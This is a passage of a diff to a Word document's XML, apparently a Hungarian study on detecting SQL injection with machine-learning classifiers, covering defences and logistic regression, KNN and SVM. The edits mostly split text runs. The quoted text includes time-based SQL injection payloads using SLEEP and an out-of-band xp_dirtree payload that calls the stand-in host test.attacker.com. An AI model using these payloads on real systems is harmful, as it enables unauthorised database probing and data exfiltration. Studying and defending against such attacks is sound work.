+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -6014,13 +6772,32 @@
         </w:rPr>
         <w:t>card</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> WHERE id=1-SLEEP(15)</w:t>
+        <w:t xml:space="preserve"> WHERE </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>id</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>=1-SLEEP(15)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6050,7 +6827,21 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>z injektálás lehetséges és a szerver a MySQL-t használja adatbázisként.</w:t>
+        <w:t xml:space="preserve">z injektálás lehetséges és a szerver a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>MySQL</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>-t használja adatbázisként.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6082,7 +6873,43 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>SELECT * FROM card WHERE id=1-IF(MID(VERSION(),1,1)=’5’, SLEEP(15),0)</w:t>
+        <w:t xml:space="preserve">SELECT * FROM </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>card</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> WHERE </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>id</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>=1-IF(MID(VERSION(),1,1)=’5’, SLEEP(15),0)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6101,7 +6928,21 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>, amely esetén ha a kiszolgáló válasza legalább 15 másodpercet vesz igénybe, megállapíthatjuk, hogy ez az adatbázis-kiszolgáló a MySQL 5.x verzióját futtatja.</w:t>
+        <w:t xml:space="preserve">, amely esetén ha a kiszolgáló válasza legalább 15 másodpercet vesz igénybe, megállapíthatjuk, hogy ez az adatbázis-kiszolgáló a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>MySQL</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 5.x verzióját futtatja.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6124,12 +6965,25 @@
         <w:t>out-of</w:t>
       </w:r>
       <w:r>
-        <w:t>-band)</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> SQLi</w:t>
+        <w:t>-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>band</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>SQLi</w:t>
       </w:r>
       <w:bookmarkEnd w:id="10"/>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -6210,6 +7064,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> például a Microsoft SQL Server </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -6218,6 +7073,7 @@
         </w:rPr>
         <w:t>xp_dirtree</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -6333,14 +7189,50 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">https://example.com/products.aspx?id=1;EXEC master..xp_dirtree '\\test.attacker.com\' </w:t>
-      </w:r>
+        <w:t xml:space="preserve">https://example.com/products.aspx?id=1;EXEC </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
+        <w:t>master</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>..</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>xp_dirtree</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> '\\test.attacker.com\' </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
         <w:t>–</w:t>
       </w:r>
       <w:r>
@@ -6368,7 +7260,79 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">SELECT * FROM product WHERE id=1;EXEC master..xp_dirtree ’\\test.attacker.com\’ </w:t>
+        <w:t xml:space="preserve">SELECT * FROM </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>product</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> WHERE </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>id</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">=1;EXEC </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>master</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>..</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>xp_dirtree</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ’\\test.attacker.com\’ </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -6617,7 +7581,43 @@
           <w:bCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Elkészített utasítások (prepared statements) használata</w:t>
+        <w:t>Elkészített utasítások (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>prepared</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>statements</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>) használata</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6685,12 +7685,14 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>boolean-based</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -6879,7 +7881,43 @@
           <w:bCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Tárolt eljárások (stored procedures) használata</w:t>
+        <w:t>Tárolt eljárások (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>stored</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>procedures</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>) használata</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -6987,6 +8025,7 @@
         </w:rPr>
         <w:t xml:space="preserve"> az </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
@@ -6995,6 +8034,7 @@
         </w:rPr>
         <w:t>sp_getAccountBalance</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -7108,7 +8148,25 @@
           <w:bCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Engedélyezőlista (allow-list) bemenetének ellenőrzése</w:t>
+        <w:t>Engedélyezőlista (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>allow-list</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>) bemenetének ellenőrzése</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7226,7 +8284,35 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> („bind variables”).</w:t>
+        <w:t xml:space="preserve"> („</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>bind</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>variables</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>”).</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7340,13 +8426,23 @@
         </w:rPr>
         <w:t xml:space="preserve">különböző ágakban vizsgálja a </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i/>
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">tableName </w:t>
+        <w:t>tableName</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -7741,12 +8837,14 @@
         </w:rPr>
         <w:t xml:space="preserve"> (</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>supervised</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -7771,12 +8869,14 @@
         </w:rPr>
         <w:t>(</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>unsupervised</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -7795,12 +8895,14 @@
         </w:rPr>
         <w:t xml:space="preserve"> (</w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>reinforcement</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -8125,7 +9227,21 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>„train”</w:t>
+        <w:t>„</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>train</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>”</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8149,7 +9265,21 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>. A címkézett adatok (train)</w:t>
+        <w:t>. A címkézett adatok (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>train</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9036,7 +10166,21 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> osztályozás (classification) és</w:t>
+        <w:t xml:space="preserve"> osztályozás (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>classification</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>) és</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9048,7 +10192,21 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> regresszió (regression). Míg az osztályozás célja, hogy megjósolja azt a kategóriát, amelyhez az adatok tartoznak, addig a regresszió számértéket jósol a korábban megfigyelt adatok alapján. Ez egy példán keresztül könnyedén megérthető: az osztályozás a „Holnap meleg lesz vagy hideg?” kérdésre </w:t>
+        <w:t xml:space="preserve"> regresszió (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>regression</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">). Míg az osztályozás célja, hogy megjósolja azt a kategóriát, amelyhez az adatok tartoznak, addig a regresszió számértéket jósol a korábban megfigyelt adatok alapján. Ez egy példán keresztül könnyedén megérthető: az osztályozás a „Holnap meleg lesz vagy hideg?” kérdésre </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9166,7 +10324,35 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> (independent variables)</w:t>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>independent</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>variables</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9208,7 +10394,35 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> (dependent variable)</w:t>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>dependent</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>variable</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9244,6 +10458,7 @@
         </w:rPr>
       </w:pPr>
       <w:bookmarkStart w:id="15" w:name="_Toc71471971"/>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -9253,9 +10468,34 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Logistic Regression</w:t>
+        <w:t>Logistic</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Regression</w:t>
       </w:r>
       <w:bookmarkEnd w:id="15"/>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -9387,18 +10627,34 @@
         </w:rPr>
         <w:t xml:space="preserve">A </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Logistic Regression</w:t>
-      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Logistic</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Regression</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -9483,12 +10739,28 @@
         </w:rPr>
         <w:t xml:space="preserve">a </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Linear Regression</w:t>
-      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Linear</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Regression</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -10038,7 +11310,21 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>logisztikai szigmoid függvény</w:t>
+        <w:t xml:space="preserve">logisztikai </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>szigmoid</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> függvény</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -10214,8 +11500,45 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>K-Nearest Neighbors</w:t>
-      </w:r>
+        <w:t>K-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Nearest</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Neighbors</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -10771,7 +12094,14 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>A távolság megtalálásának leggyakoribb módja az euklid</w:t>
+        <w:t xml:space="preserve">A távolság megtalálásának leggyakoribb módja az </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>euklid</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -10783,7 +12113,14 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>szi távolság</w:t>
+        <w:t>szi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> távolság</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -11230,7 +12567,21 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>n-dimenziós euklidészi távolság képlete</w:t>
+        <w:t xml:space="preserve">n-dimenziós </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>euklidészi</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> távolság képlete</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11269,6 +12620,7 @@
         </w:rPr>
       </w:pPr>
       <w:bookmarkStart w:id="17" w:name="_Toc71471973"/>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -11289,8 +12641,9 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">ear </w:t>
-      </w:r>
+        <w:t>ear</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -11300,8 +12653,9 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Support Vector</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -11311,8 +12665,9 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
+        <w:t>Support</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -11322,8 +12677,9 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> </w:t>
